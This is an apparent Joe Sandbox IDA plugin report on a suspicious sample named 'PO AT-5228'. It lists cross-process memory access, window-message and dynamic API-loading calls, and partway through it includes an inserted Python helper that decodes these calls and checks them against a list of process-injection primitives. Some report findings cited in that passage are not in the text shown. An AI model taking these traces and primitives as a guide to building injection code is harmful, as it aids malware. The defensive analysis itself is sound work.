                                                                                        • Instruction ID: 27f840b06467b834a4ed610ce9cc94d578449f37745e0186c45d0119a1576d22
                                                                                        • Opcode Fuzzy Hash: 848c64eba5ead7db43511f0e6a0086565c3cb6bffc30cfd07ab5fe6653525714
                                                                                        • Instruction Fuzzy Hash: C6A135756083019FCB14DF24C88496EBBE5FF89310F148998F9AA9B3A1CB35ED45CB91
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B832ED
                                                                                          • Part of subcall function 00B8E0D0: __87except.LIBCMT ref: 00B8E10B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: bcd8a5deef270bd7adae1f5b38cf56945b990381bda95f8edc2f8b31a14aa415
                                                                                        • Instruction ID: 5cf99c26ed37eb2f885faa8c0252c0c59a239ea76f85c880b3c07e6fb9fa2f3c
                                                                                        • Opcode Fuzzy Hash: bcd8a5deef270bd7adae1f5b38cf56945b990381bda95f8edc2f8b31a14aa415
                                                                                        • Instruction Fuzzy Hash: F4512771A0920296CB157B18C98537A2BD4EB40F10F248DE8F4E6832F9DF75CE98DB46
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00BFDC50,?,0000000F,0000000C,00000016,00BFDC50,?), ref: 00BA4645
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00BA46C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                                        • String ID: REMOVE$THIS
                                                                                        • API String ID: 3797816924-776492005
                                                                                        • Opcode ID: 6172734c11edf34ba5eab5fc651b7543f6e2d9a889d32c99ce90028a09c5de4d
                                                                                        • Instruction ID: 91c2820fd1a05faec556464b97ece7f6ddaae91cb8d8faec1c278e5cf7ac119e
                                                                                        • Opcode Fuzzy Hash: 6172734c11edf34ba5eab5fc651b7543f6e2d9a889d32c99ce90028a09c5de4d
                                                                                        • Instruction Fuzzy Hash: 13418034A042499FCF01DF68C881AADB7F5FF8A304F1484A9E916AB392DBB4DD45CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00BA430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC08,?,?,00000034,00000800,?,00000034), ref: 00BA4335
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B9C1D3
                                                                                          • Part of subcall function 00BA42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00BA4300
                                                                                          • Part of subcall function 00BA422F: GetWindowThreadProcessId.USER32(?,?), ref: 00BA425A
                                                                                          • Part of subcall function 00BA422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA426A
                                                                                          • Part of subcall function 00BA422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA4280
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C240
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C28D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: e4301c972a16bd665291de6b7821f1da5dea2be869e751ace6f22d19500e6b0c
                                                                                        • Instruction ID: 63dda4b4453b87aeb789a4ef7f6822df6e4fd7695930621335603170f0335e97
                                                                                        • Opcode Fuzzy Hash: e4301c972a16bd665291de6b7821f1da5dea2be869e751ace6f22d19500e6b0c
                                                                                        • Instruction Fuzzy Hash: BE411972900218AFDF11DBA4CD81AEEBBB8EB49700F0041A5FA45B7181DBB16E45CB61
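The record above is the one place in this listing where the sample opens another process, allocates in it, writes, sends window messages and reads back, so it is worth decoding the raw constants rather than reading "WriteProcessMemory" as injection by reflex. The following Python is an added analyst helper, not part of the Joe Sandbox report and not the sample's code. It parses the plugin's API lines and expands the OpenProcess mask 0x438, the VirtualAllocEx type and protection, and the SendMessageW message IDs using the values from winnt.h and commctrl.h (TVM_GETITEMRECT and TVM_HITTEST both take a struct pointer that must be valid inside the receiving process, which is what the remote allocation serves). The classification rule at the end is this helper's own heuristic, not a statement the report makes: a PAGE_READWRITE remote buffer, an access mask without PROCESS_CREATE_THREAD and no thread or APC primitive is consistent with a GUI-automation runtime reading list-view and tree-view controls out of another process, which fits the report's "compiled AutoIt script" finding; the thread-context and APC signatures the report raises would have to come from other functions. The sample input is the record's eight API lines, copied verbatim and embedded as a constructed string.

```python
import re

# Constructed sample input: the eight API lines of the report record above,
# copied as the Joe Sandbox IDA plugin prints them (bullet removed).
SAMPLE_API_LINES = """\
Part of subcall function 00BA430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC08,?,?,00000034,00000800,?,00000034), ref: 00BA4335
SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B9C1D3
Part of subcall function 00BA42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B9BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00BA4300
Part of subcall function 00BA422F: GetWindowThreadProcessId.USER32(?,?), ref: 00BA425A
Part of subcall function 00BA422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA426A
Part of subcall function 00BA422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B9BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00BA4280
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B9C28D
"""

# PROCESS_* access rights (winnt.h), used to decode the OpenProcess mask.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# VirtualAllocEx allocation type (bit mask) and page protection (enumeration).
MEM_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# Common-control messages (commctrl.h; TV_FIRST = 0x1100, LVM_FIRST = 0x1000).
# Each takes a struct pointer that must be valid in the *receiving* process,
# which is why a caller in another process allocates and writes there first.
WINDOW_MESSAGES = {
    0x1104: "TVM_GETITEMRECT",   # lParam -> RECT whose first DWORD is the HTREEITEM
    0x1111: "TVM_HITTEST",       # lParam -> TVHITTESTINFO
    0x1004: "LVM_GETITEMCOUNT",
    0x1073: "LVM_GETITEMTEXTW",  # lParam -> LVITEMW with a remote pszText buffer
}
# Calls that turn remote read/write into execution in the target.
EXEC_PRIMITIVES = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread",
                   "SetThreadContext", "NtSetContextThread",
                   "QueueUserAPC", "NtQueueApcThread"}

API_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,? ref: ([0-9A-Fa-f]{8})")


def _arg(token):
    """'?' is an unresolved argument; hex becomes int; anything else stays a string."""
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # e.g. a window class name such as SysTreeView32


def parse_api_lines(text):
    """Return [(api, module, args, ref)] for every 'Api.MODULE(args), ref: addr' line."""
    calls = []
    for api, module, raw_args, ref in API_RE.findall(text):
        args = [_arg(a) for a in raw_args.split(",")] if raw_args else []
        calls.append((api, module, args, ref))
    return calls


def decode_flags(value, table):
    """Expand a bit mask into its named bits, keeping any unnamed remainder as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:X}"] if rest else [])


def triage(text):
    """Decode the remote-memory calls in one record and classify the sequence."""
    report = {"open_process": [], "alloc": None, "messages": [],
              "remote_rw": False, "exec_primitive": None}
    for api, _module, args, _ref in parse_api_lines(text):
        if api == "OpenProcess" and args and args[0] is not None:
            report["open_process"] = decode_flags(args[0], PROCESS_ACCESS)
        elif api == "VirtualAllocEx" and len(args) >= 5 and args[4] is not None:
            mem = decode_flags(args[3], MEM_TYPE) if args[3] is not None else []
            report["alloc"] = (mem, PAGE_PROT.get(args[4], f"0x{args[4]:X}"))
        elif api in ("SendMessageW", "SendMessageA") and len(args) >= 2 and args[1] is not None:
            report["messages"].append(WINDOW_MESSAGES.get(args[1], f"0x{args[1]:04X}"))
        elif api in ("WriteProcessMemory", "ReadProcessMemory"):
            report["remote_rw"] = True
        elif api in EXEC_PRIMITIVES:
            report["exec_primitive"] = api
    # Heuristic (an assumption of this helper, not a statement from the report):
    # executable remote memory, a thread/APC primitive, or PROCESS_CREATE_THREAD
    # make the sequence injection-capable; a read/write buffer driven by
    # struct-taking control messages is a cross-process control read.
    executable = report["alloc"] is not None and report["alloc"][1].startswith("PAGE_EXECUTE")
    report["verdict"] = ("injection-capable"
                         if executable or report["exec_primitive"]
                         or "PROCESS_CREATE_THREAD" in report["open_process"]
                         else "remote-control-read")
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_API_LINES).items():
        print(f"{key:15} {value}")
```

Run against the record above, `triage` reports the OpenProcess mask as PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, the allocation as MEM_COMMIT / PAGE_READWRITE and the messages as TVM_GETITEMRECT and TVM_HITTEST, and classifies the function as a remote control read. The same helper flags a constructed VirtualAllocEx(PAGE_EXECUTE_READWRITE) followed by CreateRemoteThread as injection-capable; the unknown `?` arguments the plugin prints are kept as `None` so that a missing value never silently decodes as zero.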
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BFDC00,00000000,?,?,?,?), ref: 00BCA6D8
                                                                                        • GetWindowLongW.USER32 ref: 00BCA6F5
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BCA705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: acc23313e32111b92675ead0ca4d6f2f672ed912ab05d7de451f3fe0a8973881
                                                                                        • Instruction ID: e4722e1e92a6b6fe4060715187a9aba9ad6a2bbc3219726c9f4036cb3e8273b9
                                                                                        • Opcode Fuzzy Hash: acc23313e32111b92675ead0ca4d6f2f672ed912ab05d7de451f3fe0a8973881
                                                                                        • Instruction Fuzzy Hash: 2F316D31600209AFDB218E38CC85FEA77A9FB49768F244769F975A32E0D770EC519B50
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BCA15E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BCA172
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BCA196
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: f04011a806f4159f7ecd37ca7f2a5acf499294ea975cc8a6990c043786765dd2
                                                                                        • Instruction ID: 7c3ac374a7f07fc920affc5436299835b13327122ec4cddcd1158add9673d138
                                                                                        • Opcode Fuzzy Hash: f04011a806f4159f7ecd37ca7f2a5acf499294ea975cc8a6990c043786765dd2
                                                                                        • Instruction Fuzzy Hash: 9A21D132510218ABDF118F94CC82FEA3BB9EF49724F140258FE55BB1D0D6B5AC51CBA0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BCA941
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BCA94F
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BCA956
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: 6e41db5a7ed9a5f81b298f09338762bbc0704e97dbaffe528197d404e35d067b
                                                                                        • Instruction ID: e13db30b1f2da6675db0bae0c085a8e35a79db2a508798366b7ed0c1f33162f0
                                                                                        • Opcode Fuzzy Hash: 6e41db5a7ed9a5f81b298f09338762bbc0704e97dbaffe528197d404e35d067b
                                                                                        • Instruction Fuzzy Hash: A92183B5600209AFDB10DF54CCC6E6B37EDEB5A3A8B050199FA149B251CA70EC11CB61
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BC9A30
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BC9A40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BC9A65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: defec13a73a8516cf1c25c505eec5ee1104c53d71646e0698e8d823d7f314d82
                                                                                        • Instruction ID: c2a3d0b45dbdd868ff259d6505b042141250d89d323729dafe7476fa1f93e11e
                                                                                        • Opcode Fuzzy Hash: defec13a73a8516cf1c25c505eec5ee1104c53d71646e0698e8d823d7f314d82
                                                                                        • Instruction Fuzzy Hash: CA219532610118BFEF258F54CC89FBF3BAAEF89760F018169F9545B190C6B19C5197A0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BCA46D
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BCA482
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BCA48F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 65413784ae1909880c6c634e3eca7ce059e530145a70118bff864c2be5fef852
                                                                                        • Instruction ID: d500929476714494aa52fc86e63ccc2254c4999b8a7ee8ab37889603acda7c65
                                                                                        • Opcode Fuzzy Hash: 65413784ae1909880c6c634e3eca7ce059e530145a70118bff864c2be5fef852
                                                                                        • Instruction Fuzzy Hash: 2511E771200208BEEF245F65CC45FAB3BA9EF89768F01411CFA55A6191D6B1E811D720
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B82350,?), ref: 00B822A1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B822A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 2574300362-340411864
                                                                                        • Opcode ID: 40ab9becb1ccc6a4786a76e87dfc54ab97f1b05da9cc69e79369eea677539793
                                                                                        • Instruction ID: 43c88f65a4f4d692dbd9377b32f07bbbb3c10d5b6620ed89ce1856795dd85cd8
                                                                                        • Opcode Fuzzy Hash: 40ab9becb1ccc6a4786a76e87dfc54ab97f1b05da9cc69e79369eea677539793
                                                                                        • Instruction Fuzzy Hash: F5E04F70AA0340ABDB206F71ED8DB5C36A4B705702F204069F202D64F1CBF48091CF04
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B82276), ref: 00B82376
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B8237D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 2574300362-2819208100
                                                                                        • Opcode ID: 3695c35f68929ad3f67f2ba1748a74001809fcaa3e297a720e5de76f85d7068e
                                                                                        • Instruction ID: 6371cf483fbec48c4e10ca2ecfcdeb50c979456ea1e32941108fff869771a1f8
                                                                                        • Opcode Fuzzy Hash: 3695c35f68929ad3f67f2ba1748a74001809fcaa3e297a720e5de76f85d7068e
                                                                                        • Instruction Fuzzy Hash: 2BE0B670555340AFDB306F62ED4EB0C3AA4B705702F214465F20BE64B1CBF89421DB15
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: eb130616dfacabcb191d1368310612175163b308754f33730a214704a0dce3d1
                                                                                        • Instruction ID: 514b62092220b529de9b7eb957332bddb1717732a2d7f7f8e6b81323ee82ac29
                                                                                        • Opcode Fuzzy Hash: eb130616dfacabcb191d1368310612175163b308754f33730a214704a0dce3d1
                                                                                        • Instruction Fuzzy Hash: 75E012B1814618EBCB149750CD85DFAF3FCEB08751F1844D3BA0AA2210F6359BC4EB12
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00B642EC,?,00B642AA,?), ref: 00B64304
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B64316
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: 5947f88cf23330122b9bd61479ac2045f2492b064506eeecfe5659b429703dce
                                                                                        • Instruction ID: ffdae19753ea987498cae104ed57e7d09bc78b80e60bd10b8dc2029c72e2a6b6
                                                                                        • Opcode Fuzzy Hash: 5947f88cf23330122b9bd61479ac2045f2492b064506eeecfe5659b429703dce
                                                                                        • Instruction Fuzzy Hash: B9D0A934900B12AFC7204F20E84C7827AE8EF06312F00847EE882E3260EBF4C8C08B10
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC21FB,?,00BC23EF), ref: 00BC2213
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00BC2225
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 2574300362-399901964
• Opcode ID: 18091c2dcbf2e06b1f463ba6f733b372a58b3f0af5b2a4b2a57541a68dbf66d3
• Instruction ID: 799c3ab109bf726e54e96c18f65690abaf8ee4435da08c44b21db51625a9c484
• Opcode Fuzzy Hash: 18091c2dcbf2e06b1f463ba6f733b372a58b3f0af5b2a4b2a57541a68dbf66d3
• Instruction Fuzzy Hash: 59D0A7385007129FC7214F30F848B4176E5EF06712B00447DE841F7150DBB0D8C09750
APIs
